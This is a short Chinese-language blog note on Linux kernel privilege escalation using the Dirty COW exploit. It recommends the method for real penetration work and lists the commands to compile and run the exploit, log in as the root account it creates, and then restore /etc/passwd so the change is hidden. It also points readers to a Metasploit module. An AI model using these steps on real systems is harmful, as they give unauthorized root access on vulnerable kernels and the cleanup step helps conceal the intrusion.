linux 溢出提权小记

2017-04-22 exp 



1
2
3
4
5
6
7
8
'脏牛'[Dirty copy-on-write] 提权小记:
实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本  Dirty COW.c  2.6.22 < 3.9 
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty admin
$ su firefart
# mv /tmp/passwd.bak /etc/passwd	干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试
# exit

''

小结:
    另外还有一些比较经典的linux提权exp,后期有空会慢慢推上来

#exp